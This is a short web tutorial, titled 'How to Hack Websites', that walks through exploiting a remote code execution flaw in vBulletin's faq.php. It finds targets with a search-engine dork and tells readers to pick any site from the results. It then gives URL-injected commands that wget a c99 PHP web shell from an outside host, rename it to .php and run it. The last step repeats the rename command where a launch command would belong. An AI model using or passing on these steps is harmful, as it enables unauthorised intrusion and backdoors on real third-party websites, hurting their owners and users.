What is Remote Code Execution? How to Hack Websites
ccording to Wikipedia, Remote Code Execution can be defined as “In computer security, arbitrary code execution or remote code execution is used to describe an attacker's ability to execute any commands of the attacker's choice on a target machine or in a target process. It is commonly used in arbitrary code execution vulnerability to describe a software bug that gives an attacker a way to execute arbitrary code. A program that is designed to exploit such vulnerability is called an arbitrary code execution exploit. Most of these vulnerabilities allow the execution of machine code and most exploits therefore inject and execute shell code to give an attacker an easy way to manually run arbitrary commands. The ability to trigger arbitrary code execution from one machine on another (especially via a wide-area network such as the Internet) is often referred to as remote code execution”
vBulletin RCE Injection
Few websites running vBulletin are vulnerable to Remote Code Execution, by exploiting the vulnerability we can get our PHP backdoor shell uploaded on the website. We’ll use a dork to find the vulnerable website.
Note: Don’t keep yourself restricted when it comes to using dorks, use other search engines too other than Google, like Bing, Yahoo etc. Use of multiple search engines will help you to get more vulnerable websites.
Dork: inurl:faq.php & intext:"Warning: system() [function.system]"
Now, select any website of your choice from th search result, and go to its faq.php page. If the website is vulnerable, you will get the following on the page.
You will get an error similar to Warning: system() [function.system]: Cannot execute a blank command in [path]/faq.php(324) : eval()'d code on line 1
So, firstly upload your PHP shell on any free hosting website or you can use sh3ll.org/c99.txt as it has already got an uploaded .txt shell. (We will be first uploading our shell in .txt form, and later will be changing the extension to .php after the upload process is completed.
Suppose the vulnerable website is http://www.vulnerable.com/faq.php. So in order to upload our shell enter the following in the URL bar:
http://www.vulnerable.com/faq.php?cmd=cd /tmp;wget http://sh3ll.org/c99.txt
To check if we were able to successfully upload our shell, enter the following in the URL bar
http://www.vulnerable.com/faq.php?cmd=cd /tmp;ls -la c99.txt
Were c99.txt is the name of your uploaded shell. If we were successful in uploading our shell, we see the following text on the page. (Might be a little different in some cases)
-rw-r—r—1 nobody nobody
We know that our shell is successful uploaded on the website, now it’s time to change the file format from .txt to .php in order to execute it on the server.
http://www.vulnerable.com/faq.php?cmd=cd /tmp;mv c99.txt check.php
(You can change check.php to any other name of your choice)
Now, the file format is change. It’s time to execute our shell, so to execute it enter the following in the URL bar
http://www.vulnerable.com/faq.php?cmd=cd /tmp;mv c99.txt check.php
Bingo!! We successfully exploited vBulletin Remote Code Execution Vulnerability.